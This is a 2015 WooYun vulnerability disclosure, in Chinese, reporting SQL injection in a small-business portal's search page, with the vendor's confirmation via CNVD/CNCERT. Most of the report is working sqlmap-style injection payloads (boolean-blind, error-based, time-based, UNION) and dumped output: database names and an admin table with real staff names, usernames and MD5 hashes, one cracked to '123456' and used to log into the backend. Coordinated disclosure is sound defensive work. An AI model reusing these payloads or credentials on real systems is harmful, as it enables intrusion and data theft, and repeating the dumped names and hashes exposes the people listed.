当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147627

漏洞标题:中国中小企业陕西网sql注射漏洞暴库,后台管理账户暴露

相关厂商:中国中小企业陕西网

漏洞作者: 编程浪子

提交时间:2015-10-19 21:17

修复时间:2015-12-07 11:32

公开时间:2015-12-07 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

中国中小企业陕西网sql注射漏洞导致数据库泄露

详细说明:

注入点:
**.**.**.**/search.php?flag=sme (POST)
stype=Ubusiness&keyword=155&x=35&y=7

---
Parameter: keyword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: stype=Ubusiness&keyword=155%' AND 9224=9224#&x=35&y=7
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: stype=Ubusiness&keyword=155%' AND (SELECT 9799 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(9799=9799,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&x=35&y=7
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: stype=Ubusiness&keyword=155%' OR SLEEP(5) AND '%'='&x=35&y=7
Type: UNION query
Title: MySQL UNION query (NULL) - 54 columns
Payload: stype=Ubusiness&keyword=155%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a627671,0x6a6d7a5870696c656e65,0x7171626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&x=35&y=7
---

漏洞证明:

web server operating system: Windows
web application technology: ASP.NET, PHP 5.4.41
back-end DBMS: MySQL 5.0
available databases [11]:
[*] #mysql50#smecms-utf8
[*] destoon
[*] ecmmall
[*] information_schema
[*] mysql
[*] performance_schema
[*] sme315
[*] sme_xmsb
[*] smecms
[*] ultrax
[*] webunion


web server operating system: Windows
web application technology: ASP.NET, PHP 5.4.41
back-end DBMS: MySQL 5.0
Database: sme315
Table: admin
[3 entries]
+-----+-------+-------------------------------------------+--------------+
| Uid | Uname | Upassword | Uusername |
+-----+-------+-------------------------------------------+--------------+
| 20 | 申慧荣 | e10adc3949ba59abbe56e057f20f883e (123456) | guanli |
| 30 | 郭杰 | 79c87bd8a2abb8cb23b275afc22ecd35 | guojie |
| 29 | 乔洪英 | 9e8dd1adb0524a890caacd0878165410 | qiaohongying |
+-----+-------+-------------------------------------------+--------------+


网站后台地址:http://**.**.**.**/
弱口令 guanli 123456 登录

1.JPG


另外后台还有这个功能:

2.JPG


我就不深入了

修复方案:

用户输入过滤,
提高安全意识,不要用弱口令,
数据库权限管理

版权声明:转载请注明来源 编程浪子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-23 11:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无